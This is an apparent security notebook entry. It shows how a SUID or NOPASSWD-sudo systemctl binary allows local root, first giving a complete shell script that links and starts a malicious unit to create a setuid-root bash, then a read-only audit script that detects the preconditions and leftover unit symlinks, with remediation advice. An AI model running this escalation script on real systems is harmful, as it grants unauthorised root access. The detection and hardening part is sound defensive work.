Exploiting “systemctl”

author: Nathan Acks
date: 2021-11-03

If systemctl is SUID root, then a malicious service file can easily be abused to create a root shell: systemctl will link and start any unit file you point it at, and the unit's commands run as root.

```sh
FILE=`mktemp -u`
echo "[Service]" >> $FILE.service
echo "Type=oneshot" >> $FILE.service
echo "ExecStart=/bin/cp /bin/bash $FILE.sh" >> $FILE.service
echo "ExecStart=/bin/chmod +xs $FILE.sh" >> $FILE.service
echo "[Install]" >> $FILE.service
echo "WantedBy=multi-user.target" >> $FILE.service
systemctl link $FILE.service
systemctl start $FILE.service
$FILE.sh -p # Root!
```

Even if systemctl is not SUID root, this trick still works so long as you have NOPASSWD sudo access to it.
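The defender-side counterpart to the note above, added here as an example that is not part of the original note: a POSIX shell script that audits for the two preconditions the technique needs (a setuid systemctl binary, or a sudoers rule granting NOPASSWD systemctl or ALL) and for the artifact it leaves behind (a unit symlink in the systemd unit directory that points into a writable location, which is exactly what `systemctl link` creates). The function names, the `SUDOERS_SAMPLE` text and the list of writable directories are this example's own assumptions.

```sh
#!/bin/sh
# Added defensive audit helpers for the systemctl privilege-escalation path
# described in the note above. Example code, not part of the original note.
# Assumed/constructed: the function names, the SUDOERS_SAMPLE text and the
# list of "writable" directories are this example's own choices.

# True if the given file carries the setuid bit. A setuid systemctl lets any
# local user link and start a unit whose ExecStart lines run as root.
is_setuid() {
    [ -n "$(find "$1" -maxdepth 0 -perm -4000 2>/dev/null)" ]
}

# Read sudoers-format text on stdin and print rules that grant NOPASSWD
# execution of systemctl (or of ALL). Unrestricted systemctl via sudo is
# equivalent to root, because "systemctl link" accepts any unit file path.
nopasswd_systemctl_lines() {
    grep -E 'NOPASSWD:(.*[[:space:],])?(ALL|(/[^[:space:],]*)*/systemctl)([[:space:],]|$)'
}

# List *.service symlinks in a systemd unit directory whose target lives in
# a world- or user-writable location. "systemctl link" leaves exactly such a
# symlink behind, so this catches the residue of the technique above.
linked_units_from_writable_dirs() {
    find "$1" -maxdepth 1 -type l -name '*.service' 2>/dev/null | while read -r link; do
        target=$(readlink "$link")
        case "$target" in
            /tmp/*|/var/tmp/*|/dev/shm/*|/home/*)
                printf '%s -> %s\n' "$link" "$target" ;;
        esac
    done
}

# Constructed sample sudoers content (not from any real host) for offline use.
# Expected: alice, bob and dave are flagged; carol (password required) and
# erin (no systemctl) are not.
SUDOERS_SAMPLE='# constructed sample
alice ALL=(ALL) NOPASSWD: /bin/systemctl
bob   ALL=(ALL) NOPASSWD: ALL
carol ALL=(ALL) /bin/systemctl
dave  ALL=(ALL) NOPASSWD: /usr/bin/apt, /usr/bin/systemctl
erin  ALL=(ALL) NOPASSWD: /usr/bin/apt'

# Run the checks against the live host; every check is read-only.
audit_host() {
    bin=$(command -v systemctl 2>/dev/null || true)
    if [ -n "$bin" ] && is_setuid "$bin"; then
        echo "WARNING: $bin is setuid; any user can start an arbitrary unit as root"
    fi
    if [ -r /etc/sudoers ]; then
        nopasswd_systemctl_lines < /etc/sudoers |
            sed 's/^/WARNING: NOPASSWD systemctl rule: /'
    fi
    if [ -d /etc/systemd/system ]; then
        linked_units_from_writable_dirs /etc/systemd/system |
            sed 's/^/WARNING: unit linked from writable path: /'
    fi
    return 0
}

audit_host
```

The remediation is the obvious one: clear the setuid bit on systemctl and do not grant sudo for unrestricted systemctl. The sudoers check deliberately flags any NOPASSWD rule naming systemctl, including ones that restrict the arguments, because those still deserve a manual look.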